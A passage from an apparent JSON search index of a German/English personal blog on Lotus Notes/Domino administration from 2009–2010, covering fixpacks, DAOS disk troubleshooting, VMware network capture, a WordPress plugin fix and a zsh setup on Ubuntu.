la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-06-25-interim-fix-304-5achf1-for-inotes-8-5-1-fp3-available/","title":"Interim Fix 304.5aCHF1 for iNotes 8.5.1 FP3 available"},{"body":"FP4 for Tivoli Directory Integrator is available for download on IBM Fix Central .\nInstall command: TDI _Install_Dir/bin/applyUpdates.bat -update Fixpack.zip\n","excerpt":"\u003cp\u003eFP4 for Tivoli Directory Integrator is available for download on\n\u003ca href=\"http://www-933.ibm.com/support/fixcentral/\" target=\"_blank\"\u003eIBM Fix Central \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eInstall command:\n\u003ccode\u003eTDI _Install_Dir/bin/applyUpdates.bat -update Fixpack.zip\u003c/code\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-04-16-fixpack-4-for-tdi-7-0/","title":"Fixpack 4 for TDI 7.0"},{"body":"So, now I finally found a plugin that allows me to create bilingual articles. In the future I will, if possible, create posts in english too. You can select the language via the drop-down list in the right column.\n","excerpt":"\u003cp\u003eSo, now I finally found a plugin that allows me to create bilingual\narticles. In the future I will, if possible, create posts in english\ntoo. You can select the language via the drop-down list in the right\ncolumn.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-04-16-blogposts-in-english-too/","title":"Blogposts in english too"},{"body":"So, jetzt hab ich endlich ein Plugin, mit dem sich zweisprachige Artikel einigermaßen komfortabel erstellen lassen. In Zukunft wird es, wenn möglich, meine Posts auch in englisch geben. Auswahl erfolgt über die Dropdown-Liste am rechten Rand.\n","excerpt":"\u003cp\u003eSo, jetzt hab ich endlich ein Plugin, mit dem sich zweisprachige Artikel\neinigermaßen komfortabel erstellen lassen. In Zukunft wird es, wenn\nmöglich, meine Posts auch in englisch geben. Auswahl erfolgt über die\nDropdown-Liste am rechten Rand.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-04-16-artikel-jetzt-auch-in-englisch/","title":"Artikel jetzt auch in englisch"},{"body":"Nicht vergessen! Das Notes- und Domino-Programmverzeichnis in die Pfad-Variable aufnehmen! Bzw. das Verzeichnis in der die notes.ini liegt. Ansonsten produzieren Verbindungen mit Local Server oder Local Client die komischsten Java-Fehler.\n","excerpt":"\u003cp\u003eNicht vergessen! Das Notes- und Domino-Programmverzeichnis in die\nPfad-Variable aufnehmen! Bzw. das Verzeichnis in der die notes.ini\nliegt. Ansonsten produzieren Verbindungen mit Local Server oder Local\nClient die komischsten Java-Fehler.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-04-16-tivoli-directory-integrator-domino-connect-2/","title":"Tivoli Directory Integrator – Domino Connect"},{"body":"For my records: Do not forget to add the directory of your notes.ini (normally the Notes or Domino program folder) to the path variable! Very strange errors appear, when you want to connect to Local Server or Local Client.\n","excerpt":"\u003cp\u003eFor my records: Do not forget to add the directory of your notes.ini\n(normally the Notes or Domino program folder) to the path variable! Very\nstrange errors appear, when you want to connect to Local Server or Local\nClient.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-04-16-tivoli-directory-integrator-domino-connect/","title":"Tivoli Directory Integrator – Domino Connect"},{"body":"Während meiner Tests mit Lotus Traveler, den ich in VMware Fusion installiert habe, wollte ich den Traffic zwischen Android Simulator, Windows Mobile Simulator und iPhone Simulator mitsniffen. Unter Linux und Windows war das kein Problem, da die virtuellen Netzwerkkarten in Wireshark auftauchen und zum Aufzeichnen des Netzwerkverkehrs ausgewählt werden können.\nUnter Mac OS X Snow Leopard und Wireshark funktioniert das leider nicht.\nUnter folgendem Pfad sind alle notwendigen Tools enthalten: /Library/Application\\ Support/VMware\\ Fusion/, mit vmnet-sniffer können die Netzwerkpakete mitgelesen werden. Um einfacher auf den Sniffer zugreifen zu können, habe ich mir einen Link in /usr/bin erstellt: ln -s /Library/Application\\ Support/VMware\\ Fusion/vmnet-sniffer /usr/bin\nJetzt kann mit vmnet-sniffer -i vmnet1 -w xyz.pcap eine für Wireshark lesbare Datei erstellt werden.\n","excerpt":"\u003cp\u003eWährend meiner Tests mit Lotus Traveler, den ich in VMware Fusion installiert habe, wollte ich den Traffic zwischen Android Simulator, Windows Mobile Simulator und iPhone Simulator mitsniffen. Unter Linux und Windows war das kein Problem, da die virtuellen Netzwerkkarten in Wireshark auftauchen und zum Aufzeichnen des Netzwerkverkehrs ausgewählt werden können.\u003c/p\u003e\n\u003cp\u003eUnter Mac OS X Snow Leopard und Wireshark funktioniert das leider nicht.\u003c/p\u003e\n\u003cp\u003eUnter folgendem Pfad sind alle notwendigen Tools enthalten:\n\u003ccode\u003e/Library/Application\\ Support/VMware\\ Fusion/\u003c/code\u003e, mit \u003ccode\u003evmnet-sniffer\u003c/code\u003e\nkönnen die Netzwerkpakete mitgelesen werden. Um einfacher auf den\nSniffer zugreifen zu können, habe ich mir einen Link in \u003ccode\u003e/usr/bin\u003c/code\u003e\nerstellt:\n\u003ccode\u003eln -s /Library/Application\\ Support/VMware\\ Fusion/vmnet-sniffer /usr/bin\u003c/code\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-03-16-vmware-fusion-virtuelle-netzwerkkarte-sniffen/","title":"VMware Fusion: Virtuelle Netzwerkkarte sniffen"},{"body":"Luis Benitez schrieb heute im Socialize Me Blog einen kurzen Beitrag, wie man die Status Updates von Lotus Connections in Sharepoint anzeigen kann. Ich hab jetzt leider keinen Sharepoint greifbar, aber laut Luis ist es eine Sache von etwa 5 Minuten.\nTo add to that, I thought it would be interesting to see if I could bring Lotus Connections’ microblogging capability to Sharepoint.\nHier gehts zum Artikel. ","excerpt":"\u003cp\u003e\u003ca href=\"http://www.lbenitez.com\" target=\"_blank\"\u003eLuis Benitez \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n schrieb heute im\n\u003ca href=\"http://www.lbenitez.com\" target=\"_blank\"\u003eSocialize Me Blog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n einen kurzen Beitrag, wie man\ndie Status Updates von Lotus Connections in Sharepoint anzeigen kann.\nIch hab jetzt leider keinen Sharepoint greifbar, aber laut Luis ist es\neine Sache von etwa 5 Minuten.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eTo add to that, I thought it would be interesting to see if I could\nbring Lotus Connections’ microblogging capability to Sharepoint.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"http://www.lbenitez.com/2010/01/lotus-connections-status-updates-comes.html\" target=\"_blank\"\u003eHier\ngehts zum Artikel. \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-01-27-lotusconnections_status_in_sharepoint/","title":"Lotus Connections Status Updates in Sharepoint integrieren"},{"body":"Gestern ist der Fixpack 1 für Lotus Notes / Domino 8.5.1 erschienen. Es wird jetzt offiziell Windows 7 und Mac OS X 10.6 (Snow Leopard) unterstützt.\nIch habe es mir am Mac installiert und bin gespannt, ob es sich auf die Stabilität auswirkt. Behoben ist ein Problem mit Gif-Animationen im integrierten Sametime-Client (SPR# SHET7X7NWH – Crash in Sametime while animating a GIF leads to consistent crash at Notes startup).\nMal sehen, ob auch die Probleme mit der “Geographic Location” nicht mehr auftauchen.\nHier die komplette Liste der behobenen Probleme.\n","excerpt":"\u003cp\u003eGestern ist der Fixpack 1 für Lotus Notes / Domino 8.5.1 erschienen. Es\nwird jetzt offiziell Windows 7 und Mac OS X 10.6 (Snow Leopard)\nunterstützt.\u003c/p\u003e\n\u003cp\u003eIch habe es mir am Mac installiert und bin gespannt, ob es sich auf die\nStabilität auswirkt. Behoben ist ein Problem mit Gif-Animationen im\nintegrierten Sametime-Client (SPR# SHET7X7NWH – Crash in Sametime while\nanimating a GIF leads to consistent crash at Notes startup).\u003c/p\u003e\n\u003cp\u003eMal sehen, ob auch die Probleme mit der “Geographic Location” nicht mehr\nauftauchen.\u003c/p\u003e\n\u003cp\u003eHier die komplette Liste der behobenen Probleme.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-01-24-fixpack-1-fur-notes-8-5-1-erschienen/","title":"Fixpack 1 für Notes 8.5.1 erschienen"},{"body":"bfa_ata_body_title:\nDAOS läßt Platte überlaufen bfa_ata_body_title_multi: DAOS läßt Platte überlaufen Die Serverplatte eines Domino 8.5.1 (Suse 10.2) lief über, es war auf der Partition auf der Notes installiert ist, kein Plattenplatz mehr verfügbar.\nMittels du -hs /local/notesdata und anschliessendem du -hs /local/notesdata/DAOS wurde das Verzeichnis /local/notesdata/DAOS/0002 als Hauptverursacher (220 GB belegt) gefunden. Eine nähere Betrachtung des Verzeichnisses zeigt eine größere Anzahl von gleich großen Files (jedes 50 MB groß).\nIch lies mir das Directory mit ls -l -S nach Größe sortiert anzeigen (less ist hier des Admins Freund), also besser gleich ls -l -S | less.\nDer Befehl ls -l | grep 51013949 | wc -l brachte die Anzahl 4300, es waren also ca. 210 GB Dateien á 50 MB vorhanden. DAOS ist nur für das Verzeichnis mail aktiviert und es gibt eine Größenbeschränkung für Mails größer 20 MB. Das Erstellungsdatum der Files erstreckt sich über die letzten 4 Wochen. Befehle wie te daosmgr prune 5 brachten keinerlei Löschvorgänge. Die letzten nlo-Dateien die erstellt wurden, sind 2 Tage alt und vom Samstag, es sind aber auch nlo von Anfang Dezember vorhanden.\nDie Dateinamen waren natürlich unterschiedlich, aber die letzten 8 Zeichen waren bei allen gleich. Ich vermute, daß von einer Datei die Prüfsumme variert, da alle 4300 Dateien bitgleich groß sind. Mir ist leider kein Befehl bekannt, mit dem man feststellen kann, zu welcher Notes-Datenbank ein nlo eine Verknüpfung hat. Daher das nächste Skript:\nSchreibe alle verknüpften nlos in Textfiles: (als User Notes)\ncd /local/notesdata/mail; for i in \\`ls -l | awk '{print $8}\\ ; do /opt/ibm/lotus/bin/server -c \u0026ldquo;te daosmgr listnlo -O $i.txt ALL mail/$i\u0026rdquo;`\nMal sehen, ob einer der Dateinamen vorkommt:\nfor i in \\`ls -l | grep 51013949 | print '{print $8}'\\ ; do grep $i *.nsf.txt; done`\nJe nachdem, ob die Kommandos als Benutzer root oder notes ausgeführt werden, muß print $8 mit print $9 ersetzt werden.\nInteressanterweise gab es keine Treffer. Ich habe nicht herausgefunden, woher die Dateien kamen. Um den Server zu entlasten, wurden ein paar der Files gesichert und der Rest gelöscht.\nObwohl also keine verknüpften Datenbanken gefunden werden, werden diese mit te daosmgr prune 5 nicht gelöscht.\nEine nähere Fehleranalyse erfolgt die nächsten Tage, ich werden den DAOS Katalog neu aufbauen, DAOS nochmal deaktivieren und neu einrichten.\nSollten wieder die gleichen Dateien auftauchen, werde ich die Verschlüsselung der nlos deaktivieren und versuchen herauszufinden, um was für Dateien es sich handelt.\nAber vielleicht hat ja einer meiner Leser eine Idee zur Ursache, da sich auch das Domino Wiki und die IBM Knowledgebase zu dem Fehler nicht äussern. Wobei der Blogeintrag vorallem als Gedächtnisstütze für mich gedacht ist, damit ich mir das nächste Mal die For-Schleifen nicht wieder neu erfinden muss.\n","excerpt":"\u003cp\u003ebfa_ata_body_title:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDAOS läßt Platte überlaufen\nbfa_ata_body_title_multi:\u003c/li\u003e\n\u003cli\u003eDAOS läßt Platte überlaufen\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003cp\u003eDie Serverplatte eines Domino 8.5.1 (Suse 10.2) lief über, es war auf\nder Partition auf der Notes installiert ist, kein Plattenplatz mehr\nverfügbar.\u003c/p\u003e\n\u003cp\u003eMittels \u003ccode\u003edu -hs /local/notesdata\u003c/code\u003e und anschliessendem\n\u003ccode\u003edu -hs /local/notesdata/DAOS\u003c/code\u003e wurde das Verzeichnis\n\u003ccode\u003e/local/notesdata/DAOS/0002\u003c/code\u003e als Hauptverursacher (220 GB belegt)\ngefunden. Eine nähere Betrachtung des Verzeichnisses zeigt eine größere\nAnzahl von gleich großen Files (jedes 50 MB groß).\u003c/p\u003e\n\u003cp\u003eIch lies mir das Directory mit \u003ccode\u003els -l -S\u003c/code\u003e nach Größe sortiert anzeigen\n(less ist hier des Admins Freund), also besser gleich \u003ccode\u003els -l -S | less\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eDer Befehl \u003ccode\u003els -l | grep 51013949 | wc -l\u003c/code\u003e brachte die Anzahl 4300, es\nwaren also ca. 210 GB Dateien á 50 MB vorhanden. DAOS ist nur für das\nVerzeichnis mail aktiviert und es gibt eine Größenbeschränkung für Mails\ngrößer 20 MB. Das Erstellungsdatum der Files erstreckt sich über die\nletzten 4 Wochen. Befehle wie te daosmgr prune 5 brachten keinerlei\nLöschvorgänge. Die letzten nlo-Dateien die erstellt wurden, sind 2 Tage\nalt und vom Samstag, es sind aber auch nlo von Anfang Dezember\nvorhanden.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-01-18-daos-last-platte-uberlaufen/","title":"DAOS läßt Platte überlaufen"},{"body":"bfa_ata_body_title:\nIch mag Symphony, aber …​ bfa_ata_body_title_multi: Ich mag Symphony, aber …​ tags:\nWarren Elsmore hat einen neuen Blog-Post zu Symphony und Keynote verfasst. Er spricht mir dabei aus der Seele, man kann eigentlich nichts hinzufügen. Ich steh auf Keynote für Präsentationen!\nElsmore.net :: I like Symphony, but … ","excerpt":"\u003cp\u003ebfa_ata_body_title:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIch mag Symphony, aber …​\nbfa_ata_body_title_multi:\u003c/li\u003e\n\u003cli\u003eIch mag Symphony, aber …​\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003etags:\u003c/p\u003e\n\u003cp\u003eWarren Elsmore hat einen neuen Blog-Post zu Symphony und Keynote\nverfasst. Er spricht mir dabei aus der Seele, man kann eigentlich nichts\nhinzufügen. Ich steh auf Keynote für Präsentationen!\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.elsmore.net/warren/blog.nsf/d6plinks/WELE-7ZLNUF\" target=\"_blank\"\u003eElsmore.net\n:: I like Symphony, but … \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-01-11-ich-mag-symphony-aber/","title":"Ich mag Symphony, aber …"},{"body":"bfa_ata_body_title:\n\u0026lsquo;Domino: Directory Independence wird nicht fortgeführt\u0026rsquo; bfa_ata_body_title_multi: \u0026lsquo;Domino: Directory Independence wird nicht fortgeführt\u0026rsquo; Schöner Mist, genau das Feature das wirklich von vielen herbeigesehnt wird und auch die Lösung für verschiedene Probleme wäre, wird von IBM nur in den Hosted Services fortgeführt, wird aber seinen Weg nicht in Domino finden. Sehr schade!\n[…] _\nThe intent of the Domino Directory Independence (DI) capability was to enable Notes and Domino to store person and group information exclusively in an LDAP Directory. This was a significant initiative undertaken by the Domino Development team, specifically, DI had the goal of easing the burden for administrators who deploy and manage multiple directories. We have made the business decision to leverage DI in IBM’s hosted offerings, but there are no plans to provide this Directory Independence capability in Domino.\n[…] _\naus Technote 21416004 Links: What is the future of the Domino Directory Independence capability? Elsmore.net: Directory Independance is dead (in case you didn’t know) ","excerpt":"\u003cp\u003ebfa_ata_body_title:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026lsquo;Domino: Directory Independence wird nicht fortgeführt\u0026rsquo;\nbfa_ata_body_title_multi:\u003c/li\u003e\n\u003cli\u003e\u0026lsquo;Domino: Directory Independence wird nicht fortgeführt\u0026rsquo;\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003cp\u003eSchöner Mist, genau das Feature das wirklich von vielen herbeigesehnt\nwird und auch die Lösung für verschiedene Probleme wäre, wird von IBM\nnur in den Hosted Services fortgeführt, wird aber seinen Weg nicht in\nDomino finden. Sehr schade!\u003c/p\u003e\n\u003cp\u003e[…]\n\u003cem\u003e_\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThe intent of the Domino Directory Independence (DI) capability was to\nenable Notes and Domino to store person and group information\nexclusively in an LDAP Directory. This was a significant initiative\nundertaken by the Domino Development team, specifically, DI had the goal\nof easing the burden for administrators who deploy and manage multiple\ndirectories. We have made the business decision to leverage DI in IBM’s\nhosted offerings, but there are no plans to provide this Directory\nIndependence capability in Domino.\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-01-07-domino-directory-independence/","title":"Directory Independence wird nicht fortgeführt"},{"body":"Gregg Eldred schrieb gestern in seinem Blog eine interessante Ausführung zu Deny Access Lists und wie man eventuell trotzdem noch Mails versenden kann, obwohl man dort bereits eingetragen ist.\nSnTT: When Deny Lists Don’t Work ","excerpt":"\u003cp\u003eGregg Eldred schrieb gestern in seinem Blog eine interessante Ausführung\nzu Deny Access Lists und wie man eventuell trotzdem noch Mails versenden\nkann, obwohl man dort bereits eingetragen ist.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSnTT: When Deny Lists Don’t Work\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2009/2009-12-31-interessantes-zu-deny-access-lists/","title":"Interessantes zu Deny Access Lists"},{"body":"Auf der Seite http://www.lts-prien.de habe ich das Plugin Larsens Calender eingebaut, da mir die Funktion sehr praktisch vorkam.\nDa ich in meinem Webspace mehrere WordPress Instanzen installiert habe, die mit unterschiedlichen Tabellen Prefixes die gleiche MySQL Datenbank verwenden, fiel mir schnell auf, daß der Kalender dieses Prefix nicht ausliest, sondern immer die Tabelle wp_larsenscalender schreibt, bzw. liest.\nIch habe die vorhandenen Sourcen so geändert, daß der Prefix verwendet wird und ausserdem ein Beschreibungsfeld hinzugefügt, das in den Sourcen fast fertig programmiert war, aber in den Formularen nicht auftauchte.\nDie Änderungen habe ich an Lars gemailt und ich hoffe er wird das in seine Version übernehmen, damit das in WordPress direkt installiert werden kann. Bis dahin findet ihr hier das geänderte Plugin:\nlarsen1.3.1\nZur Installation die Zipdatei in euer WordPress-Verzeichnis /wp-content/plugins entpacken.\nUpdate: Die Version 1.3 hatte noch kleinere Probleme beim Ändern von Einträgen und Löschen, das ist jetzt behoben. Ausserdem habe ich den Link in eine Extra-Spalte gepackt.\n","excerpt":"\u003cp\u003eAuf der Seite \u003ca href=\"http://www.lts-prien.de\" target=\"_blank\"\u003ehttp://www.lts-prien.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n habe ich das Plugin\n\u003ca href=\"http://wordpress.org/extend/plugins/larsens-calender/\" target=\"_blank\"\u003eLarsens Calender \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\neingebaut, da mir die Funktion sehr praktisch vorkam.\u003c/p\u003e\n\u003cp\u003eDa ich in meinem Webspace mehrere WordPress Instanzen installiert habe,\ndie mit unterschiedlichen Tabellen Prefixes die gleiche MySQL Datenbank\nverwenden, fiel mir schnell auf, daß der Kalender dieses Prefix nicht\nausliest, sondern immer die Tabelle wp_larsenscalender schreibt, bzw.\nliest.\u003c/p\u003e\n\u003cp\u003eIch habe die vorhandenen Sourcen so geändert, daß der Prefix verwendet\nwird und ausserdem ein Beschreibungsfeld hinzugefügt, das in den Sourcen\nfast fertig programmiert war, aber in den Formularen nicht auftauchte.\u003c/p\u003e\n\u003cp\u003eDie Änderungen habe ich an Lars gemailt und ich hoffe er wird das in\nseine Version übernehmen, damit das in WordPress direkt installiert\nwerden kann. Bis dahin findet ihr hier das geänderte Plugin:\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-12-23-plugin-larsens-calender/","title":"Plugin Larsens Calender"},{"body":"Nach einem Update von 7.0.3 auf Domino 8.5.1 hatte ich diese Woche den Fall, daß der Http-Task nicht mehr starten wollte. Die Fehlermeldung war:\n\u0026lt;br /\u0026gt; \u0026quot;HTTP Server: Error - Unable to Bind , port 80, port may be in use\u0026quot;\nMein erster Gedanke war natürlich, daß eventuell eine andere Software den Port in Benutzung (Test mit netstat -an) hat, aber da lag ich leider falsch.\nBei Gregg Eldred fand ich dann einen Hinweis:\nDomino 8 tests for and returns an error for a misconfiguration of the Server document. Domino 7 did not test for this condition.\nIf the “Host name(s)” field in the Server document \u0026gt; Internet Protocols \u0026gt; HTTP tab contains both an IP Address and server name when “bind to host name” is enabled, then an error occurs because you do not need to specify both an IP and server name in that field. Only one value is required.\nIn diesem Fall war keine Mischung aus FQDN und IP eingetragen, sondern der FQDN und zwei DNS Aliase. Alle drei Einträge waren auf die gleiche IP auflösbar. Diese Einträge genügten, um den Http-Task nicht starten zu lassen.\n","excerpt":"\u003cp\u003eNach einem Update von 7.0.3 auf Domino 8.5.1 hatte ich diese Woche den\nFall, daß der Http-Task nicht mehr starten wollte. Die Fehlermeldung\nwar:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003e\u0026lt;br /\u0026gt; \u0026quot;HTTP Server: Error - Unable to Bind , port 80, port may be in use\u0026quot;\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eMein erster Gedanke war natürlich, daß eventuell eine andere Software\nden Port in Benutzung (Test mit \u003ccode\u003enetstat -an\u003c/code\u003e) hat, aber da lag ich\nleider falsch.\u003c/p\u003e\n\u003cp\u003eBei Gregg Eldred fand ich dann einen Hinweis:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eDomino 8 tests for and returns an error for a misconfiguration of the\nServer document. Domino 7 did not test for this condition.\u003c/p\u003e\n\u003cp\u003eIf the “Host name(s)” field in the Server document \u0026gt; Internet Protocols\n\u0026gt; HTTP tab contains both an IP Address and server name when “bind to\nhost name” is enabled, then an error occurs because you do not need to\nspecify both an IP and server name in that field. Only one value is\nrequired.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-12-21-domino-8-5-1-http-cannot-bind-to-port-80/","title":"Domino 8.5.1 – http cannot bind to port 80"},{"body":"Nachdem gestern die ersten Versuche einer MySQL Migration von 4.1 zu 5.0 nicht funktioniert hatten, habe ich beim Rückspielen des Backups Probleme mit den Sonderzeichen bekommen.\nIch habe daher meine Seite neu aufgebaut und lösche die alte Installation. An sich sollten die Texte komplett importiert worden sein, es fehlen aber noch ein paar Plugins.\n","excerpt":"\u003cp\u003eNachdem gestern die ersten Versuche einer MySQL Migration von 4.1 zu 5.0\nnicht funktioniert hatten, habe ich beim Rückspielen des Backups\nProbleme mit den Sonderzeichen bekommen.\u003c/p\u003e\n\u003cp\u003eIch habe daher meine Seite neu aufgebaut und lösche die alte\nInstallation. An sich sollten die Texte komplett importiert worden sein,\nes fehlen aber noch ein paar Plugins.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-12-20-neues-layout-migration/","title":"Neues Layout – Migration"},{"body":"Vor 20 Jahren wurde Lotus Notes 1.0 released.\nThe History of Notes and Domino Ed Brill: 20 years ago today…Notes 1.0 ","excerpt":"\u003cp\u003eVor 20 Jahren wurde Lotus Notes 1.0 released.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.ibm.com/developerworks/lotus/library/ls-NDHistory/\" target=\"_blank\"\u003eThe\nHistory of Notes and Domino \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www.edbrill.com/ebrill/edbrill.nsf/dx/20-years-ago-today%e2%80%a6%e2%80%8bnotes-1.0?opendocument\u0026amp;comments\" target=\"_blank\"\u003eEd\nBrill: 20 years ago today…Notes 1.0 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2009/2009-12-07-happy-birthday-lotus-notes/","title":"Happy Birthday Lotus Notes"},{"body":" Slide aus einer Präsentation von Cecil Clijoux:\n[Interessanter Slide bzw. Beitrag bei Lotus Germany\n]2 Da kann man eigentlich nichts mehr hinzufügen. Ich verstehe den Hype um Sharepoint überhaupt nicht. Ich gebe ja zu, daß z.B. Lotus Connections eher aufwändig zu installieren ist, aber dafür habe ich dann eine coole Web 2.0 Anwendung, die auch für mehrere tausend User gut skaliert.\n","excerpt":"\u003cblockquote\u003e\n\u003cp\u003eSlide aus einer\n\u003ca href=\"http://tkrischak.posterous.com/enterprise-20-fostering-knowledge-management\" target=\"_blank\"\u003ePräsentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nvon Cecil Clijoux:\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e[Interessanter Slide bzw. Beitrag bei Lotus Germany\u003c/p\u003e\n\u003cp\u003e]\u003ca href=\"http://connections.euluc.com/blogs/lotusgermany/entry/enterprise_2_0_why_can_t_we_just_use_sharepoint?lang=de\" target=\"_blank\"\u003e2 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eDa kann man eigentlich nichts mehr hinzufügen. Ich verstehe den Hype um\nSharepoint überhaupt nicht. Ich gebe ja zu, daß z.B. Lotus Connections\neher aufwändig zu installieren ist, aber dafür habe ich dann eine coole\nWeb 2.0 Anwendung, die auch für mehrere tausend User gut skaliert.\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-12-06-lotus-germany-why-cant-we-just-use-sharepoint/","title":"Lotus Germany: Why can’t we just use Sharepoint"},{"body":"Nachdem die z-Shell einige nette Features bringt, die Bash noch nicht, bzw. nicht unterstützt, installiere ich die z-Shell für meinen Ubuntu-Benutzer als Default.\nsudo apt-get install zsh\nEine gute Grundlage ist die zshrc von GRML .\n\u0026lt;br /\u0026gt; # IMPORTANT: please note that you might override an existing\u0026lt;br /\u0026gt; # configuration file in the current working directory! ⇒\u0026lt;br /\u0026gt; wget -O .zshrc http://git.grml.org/f/grml-etc-core/etc/zsh/zshrc\u0026lt;br /\u0026gt;\nDanach kann man mit zsh testen, ob der Befehl richtig ausgeführt wird. Als Abschluß setze ich die z-Shell als Default-Shell:\nchsh -s /usr/bin/zsh username\nWeiterführende Links zur z-Shell: grml.org – Zsh zsh.org Zsh-Liebhaberseite ","excerpt":"\u003cp\u003eNachdem die z-Shell einige nette Features bringt, die Bash noch nicht,\nbzw. nicht unterstützt, installiere ich die z-Shell für meinen\nUbuntu-Benutzer als Default.\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003esudo apt-get install zsh\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eEine gute Grundlage ist die zshrc von \u003ca href=\"http://grml.org/zsh\" target=\"_blank\"\u003eGRML \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003e\u0026lt;br /\u0026gt; # IMPORTANT: please note that you might override an existing\u0026lt;br /\u0026gt; # configuration file in the current working directory! ⇒\u0026lt;br /\u0026gt; wget -O .zshrc http://git.grml.org/f/grml-etc-core/etc/zsh/zshrc\u0026lt;br /\u0026gt;\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eDanach kann man mit zsh testen, ob der Befehl richtig ausgeführt wird.\nAls Abschluß setze ich die z-Shell als Default-Shell:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003echsh -s /usr/bin/zsh username\u003c/code\u003e\u003c/p\u003e\n\u003ch1 id=\"weiterführende-links-zur-z-shell\"\u003eWeiterführende Links zur z-Shell: \u003ca href=\"#weiterf%c3%bchrende-links-zur-z-shell\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://grml.org/zsh\" target=\"_blank\"\u003egrml.org – Zsh \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://zsh.org\" target=\"_blank\"\u003ezsh.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2009/2009-10-19-ubuntu-9-10-bash-durch-zsh-ersetzen/","title":"Ubuntu 9.10: bash durch zsh ersetzen"},{"body":"Hatte grad das Problem, daß Notes 8.5.1 unter Ubuntu 9.10 Teile des Fensters falsch anzeigt. Hier die Lösung!\n[…]Wer ein Update auf die – bald stabile – Ubuntu Version macht und mit Lotus Notes 8.5 darauf arbeitet, wird sich nach dem ersten Neustart wundern. Notes sieht komisch aus :-)\nDie grafische Oberfläche von Notes ist teilweise nicht sichtbar, Fensterinhalte sind komplett leer … Die Lösung ? Eigentlich ganz einfach. Es müssen nur ein paar libs ausgetauscht werden.[…] [den ganzen Artikel und die Libs auf Linux AHA]1 Danke schön für die Libs! Die funktionieren auch mit Lotus Notes 8.5.1\n","excerpt":"\u003cp\u003eHatte grad das Problem, daß Notes 8.5.1 unter Ubuntu 9.10 Teile des\nFensters falsch anzeigt. Hier die Lösung!\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[…]Wer ein Update auf die – bald stabile – Ubuntu Version macht und mit\nLotus Notes 8.5 darauf arbeitet, wird sich nach dem ersten Neustart\nwundern. Notes sieht komisch aus 